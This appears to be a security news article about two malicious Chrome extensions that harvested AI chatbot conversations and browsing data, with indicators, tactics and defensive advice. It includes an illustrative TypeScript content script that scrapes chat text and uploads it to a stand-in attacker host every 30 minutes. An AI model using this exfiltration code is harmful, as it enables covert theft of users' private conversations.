Security researchers have uncovered a disturbing new browser threat: two malicious Chrome extensions on the official Chrome Web Store that were designed to extract AI chatbot conversations and browsing activity from users’ browsers and send this information to remote attacker‑controlled servers. Combined, these extensions had been installed by about 900,000 users, putting a large population of individuals and organizations at risk of privacy invasion, corporate espionage, identity theft, and targeted phishing campaigns.

This incident highlights how browser extensions — especially those tied to AI tools — can be abused to siphon highly sensitive data without a user’s awareness, and underscores the urgent need for more effective vetting and monitoring of add‑ons in official marketplaces.

How the Threat Was Discovered

Cybersecurity analysts identified two seemingly legitimate Chrome extensions that, on the surface, marketed themselves as tools for integrating multiple AI services — including OpenAI’s ChatGPT, Anthropic’s Claude, and DeepSeek — directly into the browser. Deeper analysis, however, revealed far more sinister behavior: the add‑ons were automatically reading AI conversation content and browsing activity and transmitting it to attacker‑controlled remote servers every 30 minutes.

These extensions are:

  • Chat GPT for Chrome with GPT‑5, Claude Sonnet & DeepSeek AI — installed by roughly 600,000 users (extension ID fnmihdojmnkclgjpcoonokmkhjpjechg)
  • AI Sidebar with Deepseek, ChatGPT, Claude, and more — installed by about 300,000 users (extension ID inhcgfpbfdjbjogdfjbclgolkmhnooop)

Both were hosted on the Google Chrome Web Store, and one of them even carried a “Featured” badge at one point — a designation users often interpret as meaning the extension is vetted or trustworthy.

What the Malicious Extensions Actually Did

Once installed, these extensions ask users to consent to the collection of “anonymous, non‑identifiable analytics data” under the pretext of improving the sidebar AI experience. In reality, the code embedded in them actively:

  • Extracts user conversations with AI chatbots (such as ChatGPT and DeepSeek)
  • Reads Chrome tab URLs and browsing activity
  • Stores this data locally
  • Exfiltrates the harvested information to attacker‑controlled domains such as chatsaigpt[.]com and deepaichats[.]com on a recurring 30‑minute interval

The extraction mechanism scans the page’s Document Object Model (DOM) for text nodes associated with chatbot conversation fields, then captures and uploads that text. This allows the extensions to collect not just a user’s browsing history but potentially highly sensitive interaction data from AI tools, where users may have discussed personal thoughts, business strategies, or confidential topics.
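To make that mechanism concrete, below is a minimal TypeScript sketch of how a content script could implement the pattern the researchers describe. It is illustrative only: the selector, endpoint, and storage details are placeholder assumptions inferred from the description above, not code recovered from the actual extensions.

```typescript
// Illustrative sketch of the reported pattern -- NOT the malware's actual code.
// Runs as an extension content script inside the chatbot's page.

const EXFIL_ENDPOINT = "https://attacker.example/collect"; // placeholder domain
const MESSAGE_SELECTOR = "[data-message]"; // hypothetical chat-message selector

const captured: string[] = [];

// 1. Scrape visible conversation text out of the page's DOM.
function scrapeConversation(): void {
  document.querySelectorAll(MESSAGE_SELECTOR).forEach((node) => {
    const text = node.textContent?.trim();
    if (text) captured.push(text);
  });
}

// 2. Re-scrape whenever the page renders new messages.
new MutationObserver(scrapeConversation).observe(document.body, {
  childList: true,
  subtree: true,
});

// 3. Upload everything gathered so far on a fixed 30-minute timer,
//    bundling the current tab URL with the harvested chat text.
setInterval(() => {
  if (captured.length === 0) return;
  void fetch(EXFIL_ENDPOINT, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ url: location.href, messages: captured.splice(0) }),
  });
}, 30 * 60 * 1000);
```

Because everything here runs inside pages the user has already authorized the extension to access, no step in this flow produces a visible prompt or warning.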

Impersonation and Distribution Tactics

The attackers behind these extensions intentionally modeled their products after a known legitimate add‑on — “Chat with all AI models (Gemini, Claude, DeepSeek…) & AI Agents” from a publisher called AITOPIA, which has around one million users. By mimicking the naming, layout, and description conventions of a trusted extension, they increased the chances that users would install the malicious copies without recognizing the difference.

Additionally, the malicious developers used Lovable, an AI‑powered web development platform, to host fake privacy policies and other superficially legitimate infrastructure (e.g., domains like chataigpt[.]pro and chatgptsidebar[.]pro), lending the operation a further veneer of legitimacy.

This tactic of deception through trusted branding and polished presentation is a hallmark of extension‑based malware campaigns: it lowers the threshold for user trust and increases the likelihood of installation.

Why This Attack Matters: Prompt Poaching and Beyond

Security researchers have begun referring to this type of attack as “prompt poaching”: the quiet capture of user prompts and conversations with generative AI tools through an extension the user willingly installed.

This technique was observed previously in other extensions like Urban VPN Proxy, which was found to be silently harvesting AI chat data from users and sending it to remote analytics servers. Prompt poaching represents a meaningful escalation in browser extension abuse because:

  • AI chat history can contain deeply personal or sensitive information, including business plans, confidential queries, strategic decisions, proprietary code snippets, health or legal discussions, and more.
  • Browser extensions — once granted permissions — have broad access to browser content and can operate with minimal visibility to users (see the manifest sketch after this list).
  • Combined with browsing activity data, captured AI conversations can provide a comprehensive picture of a user’s online behavior and interests.
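As a rough illustration of the second point, the sketch below shows the kind of Manifest V3 permission grant that gives an extension this reach, rendered as a TypeScript object so each entry can be annotated. The values are generic examples, not taken from the malicious extensions’ actual manifests.

```typescript
// Illustrative Manifest V3 excerpt, expressed as a TypeScript object.
// An extension installed with these entries can read page content and
// tab URLs on every site the user visits.
const manifestExcerpt = {
  permissions: ["tabs", "storage"], // enumerate open tabs/URLs; persist harvested data
  host_permissions: ["<all_urls>"], // operate on any origin
  content_scripts: [
    // content.js runs inside every page's DOM, with full read access
    { matches: ["<all_urls>"], js: ["content.js"] },
  ],
};
```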

The attackers behind the recently exposed extensions exploited these capabilities to systematically aggregate user data, making the threat not just a privacy issue but a potential tool for corporate espionage and identity theft.

Consequences for Users and Organizations

The impact of such malicious extensions goes far beyond personal annoyance or minor privacy leaks. Because the data exfiltrated by these extensions includes AI chatbot conversations and full browsing histories, the potential consequences include:

1. Corporate Espionage

Organizations with employees who installed these add‑ons may have inadvertently exposed internal communications, strategic discussions, planning sessions, and sensitive browser‑based workflows to external actors. Such intelligence could be used to gain competitive advantage or mount targeted attacks.

2. Identity Theft and Profiling

Collected AI conversations may include personal identifiers, preferences, saved credentials, or other personally identifiable information (PII) that attackers can exploit to commit identity fraud or account takeover.

3. Targeted Phishing and Social Engineering

With detailed records of browsing and AI interactions, attackers can craft extremely personalized phishing campaigns or social engineering lures that are harder for security filters and users to detect.

4. Exfiltration of Sensitive URLs

The extensions captured not only AI chats but also the URLs of every open tab, including internal corporate portals, cloud dashboards, and other web applications users would never intend to expose. This information can directly facilitate lateral movement or targeted attacks against internal systems.
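Capturing that tab inventory takes very little code. As a generic illustration (again, not recovered malware code), any extension holding the “tabs” permission can enumerate every open tab from its background service worker:

```typescript
// Illustrative sketch: assumes an extension context with the "tabs" permission.
chrome.tabs.query({}, (tabs) => {
  const openTabs = tabs
    .map((tab) => ({ url: tab.url, title: tab.title }))
    .filter((t) => t.url !== undefined); // url is only populated when "tabs" is granted
  console.log(openTabs); // a real campaign would upload this list to its server
});
```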

Marketplace and Policy Implications

That these extensions were hosted on the official Chrome Web Store — one of the most trusted distribution platforms for browser add‑ons — raises serious questions about the effectiveness of current vetting processes. Chrome’s Web Store is expected to block malicious or privacy‑violating add‑ons, and the presence of these exfiltrating extensions suggests attackers are finding ways to bypass those checks or exploit loopholes.

Although one of the malicious extensions has lost its “Featured” badge — indicating that Google may be taking action — the fact that it was able to reach such widespread distribution before detection highlights the need for stronger automated scanning, runtime behavior analysis, and ongoing review.

How Users Can Protect Themselves

Given the stealthy nature of this attack and the broad reach of impacted extensions, users are advised to take the following precautions:

1. Remove Suspicious Extensions Immediately

If you have installed any third‑party extensions related to AI chat integration, especially those not published by well‑known developers, review them and remove anything you cannot vouch for. In particular, search for and uninstall the following (administrators will find a fleet‑wide blocking option sketched after this list):

  • Chat GPT for Chrome with GPT‑5, Claude Sonnet & DeepSeek AI
  • AI Sidebar with Deepseek, ChatGPT, Claude, and more
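For managed Chrome fleets, administrators can block the two reported extension IDs centrally via Chrome’s ExtensionInstallBlocklist enterprise policy. The sketch below expresses the policy as a TypeScript object mirroring the JSON that, on Linux, is placed under /etc/opt/chrome/policies/managed/; Windows delivers the same setting via Group Policy and macOS via configuration profiles.

```typescript
// Policy payload (serialize to JSON for deployment). The IDs are the ones
// reported for the two malicious extensions.
const blocklistPolicy = {
  ExtensionInstallBlocklist: [
    "fnmihdojmnkclgjpcoonokmkhjpjechg", // Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI
    "inhcgfpbfdjbjogdfjbclgolkmhnooop", // AI Sidebar with Deepseek, ChatGPT, Claude, and more
  ],
};
```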

2. Review Extension Permissions

Before installing any extension, always check what permissions it requests. Be highly skeptical of add‑ons that ask to read data from all websites or access browsing activity; in Chrome, this surfaces at install time as a warning such as “Read and change all your data on all websites.”

3. Avoid Downloads from Unknown Sources

Even if an extension appears in search results or has many installs, don’t install it unless you are confident in its legitimacy and trustworthiness. High installation numbers alone do not guarantee safety.

4. Stay Informed About Security Alerts

Follow updates from browser vendors, cybersecurity firms, and reputable news outlets about extension threats, malware campaigns, and data privacy issues.

The Bigger Picture: Browser Extensions as a Security Weakness

This incident is part of a broader trend of browser extension abuse — where malicious actors weaponize legitimate‑appearing add‑ons to spy on users, redirect traffic, inject ads, steal credentials, or hijack sessions. Research indicates that malicious or compromised extensions can go undetected for long periods, sometimes due to weaknesses in vetting mechanisms and the sheer volume of submissions to extension marketplaces.

Whether disguised as AI tools, proxy utilities, or helpful sidebar assistants, extensions can request powerful browser permissions that make it possible to monitor nearly all user activity. This makes them an ideal attack vector not just for casual privacy invasion but for systematic data collection, user tracking, and espionage.

Conclusion: Vigilance Is Essential in the Age of AI Extensions

The discovery of these two malicious Chrome extensions underscores a troubling reality: as AI tools become more integrated into web browsers, malicious actors are increasingly exploiting this trend to harvest sensitive user data under the guise of productivity. With nearly a million installs between them, these add‑ons demonstrate just how quickly browser threats can scale and how deeply they can infiltrate everyday workflows.

Users and administrators alike must remain vigilant about what extensions they install and maintain ongoing hygiene and review practices. Removing unknown or untrusted extensions, scrutinizing permissions, and staying current on security alerts are all essential steps to safeguard personal and organizational data against this growing class of browser extension threats.